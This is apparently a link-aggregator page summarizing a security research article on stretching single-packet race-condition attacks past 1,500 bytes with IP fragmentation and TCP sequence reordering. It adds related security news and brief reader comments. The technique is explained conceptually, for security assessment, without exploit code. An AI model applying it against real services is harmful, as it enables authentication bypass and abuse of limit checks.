August 5th, 2024

Single-packet race condition breaking the 65535 byte lim

A Flatt Security article discusses a new method for exploiting single-packet race conditions using IP fragmentation and TCP sequence number reordering, enhancing attack efficiency and addressing vulnerabilities in server configurations.

Read original articleLink Icon
Single-packet race condition breaking the 65535 byte lim

A recent article by RyotaK from Flatt Security discusses advancements in exploiting single-packet race conditions, specifically addressing the limitations of the traditional single-packet attack, which is restricted to around 1,500 bytes. The author introduces a method to extend this limit using IP fragmentation and TCP sequence number reordering, allowing for the simultaneous sending of large requests. By fragmenting TCP packets into multiple IP packets and controlling the order of packet processing through sequence numbers, the technique enables the exploitation of vulnerabilities such as authentication bypass in one-time token systems.

The article outlines the mechanics of the attack, demonstrating that it is possible to send 10,000 requests in approximately 166 milliseconds, significantly improving upon previous methods. However, the effectiveness of this approach is contingent on server configurations, particularly the SETTINGS_MAX_CONCURRENT_STREAMS setting in HTTP/2, which limits the number of simultaneous requests. The author notes that while modern servers typically have sufficient buffer sizes, the attack's success may vary based on the server's implementation of HTTP/2.

Further improvements are suggested, including support for HTTPS and better integration with existing proxy tools. The article concludes by emphasizing the potential of the First Sequence Sync technique for exploiting limit-overrun vulnerabilities that are challenging to address with conventional methods, highlighting its value in security assessments and penetration testing.

Related

The Rise of Packet Rate Attacks: When Core Routers Turn Evil

The Rise of Packet Rate Attacks: When Core Routers Turn Evil

Packet rate attacks, a new trend in DDoS attacks, overload networking devices near the target. OVHcloud faced attacks exceeding 100 Mpps, some from MikroTik Routers, prompting enhanced protection measures.

Beyond bufferbloat: End-to-end congestion control cannot avoid latency spikes

Beyond bufferbloat: End-to-end congestion control cannot avoid latency spikes

End-to-end congestion control methods like TCP and QUIC face challenges in preventing latency spikes, especially in dynamic networks like Wi-Fi and 5G. Suggestions include anticipating capacity changes and prioritizing latency-sensitive traffic for a reliable low-latency internet.

Threat actors quick to weaponize PoC exploits; 6.8% of all internet traffic DDoS

Threat actors quick to weaponize PoC exploits; 6.8% of all internet traffic DDoS

Hackers exploit PoC exploits within 22 minutes of release, leaving little time for defense. Cloudflare advises using AI for quick detection rules. DDoS attacks contribute to 6.8% of daily internet traffic, rising to 12% during major events.

Cloudflare reports almost 7% of internet traffic is malicious

Cloudflare reports almost 7% of internet traffic is malicious

Cloudflare's report highlights a rise in malicious internet traffic, driven by global events. It emphasizes the need for timely patching against new vulnerabilities, notes a surge in DDoS attacks, stresses API security, and warns about harmful bot traffic. Organizations are urged to adopt robust security measures.

OpenSSL bug exposed up to 255 bytes of server heap and existed since 2011

OpenSSL bug exposed up to 255 bytes of server heap and existed since 2011

CVE-2024-5535 is a historical OpenSSL vulnerability allowing buffer overreads, affecting Python and Node.js versions up to 3.9 and 9, respectively. Users should review usage of `SSL_select_next_proto`.

Link Icon 9 comments
By @com - 9 months
Please don’t correct the title, it’s delightful as it is.
By @simiones - 9 months
It should be noted that IP fragmentation is quite limited and often buggy. IPv6 only requires receivers to re-assemble an IP packet that is at most 1500 bytes, so sending a 65KB TCP segment is quite likely to just result in dropped packets.

Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices are configured in the right way. Additionally, IPv6 actually supports packets up to ~4GiB in size (so called "jumbograms", with an additional header), though I think it would be truly hard to find any network which uses this feature.

By @wrs - 9 months
BTW, you don’t have to rent servers on opposite sides of the planet just to increase network latency for testing.

    tc qdisc add dev eth0 root netem delay 200ms
By @AstralStorm - 9 months
So, is this a DoS technique or what? Or trying to avoid TCP side transmission rate limits, which anyway should be implemented IP side?
By @weissnick - 9 months
This technique is briefly discussed in chapter 5.3.1 in the master thesis "Exploiting Race Conditions in Web Applications with HTTP/2" - https://ntnuopen.ntnu.no/ntnu-xmlui/handle/11250/2781157

The same paper is also referenced to by James Kettle in his research.

By @algesten - 9 months
I assume with HTTP/1.1 this would be less useful, since each synchronized request would require another socket, thus hitting potential firewalls limiting SYN/SYN-ACK rate and/or concurrent connections from the same IP.

In some respects this is abusing the exact reason we got HTTP/3 to replace HTTP/2 – it's a deliberate Head-of-Line (HoL) blocking.

By @Out_of_Characte - 9 months
This title is about as apt as my username
By @tontonius - 9 months
"Its not clear why TCP settled on such an oddly specific number"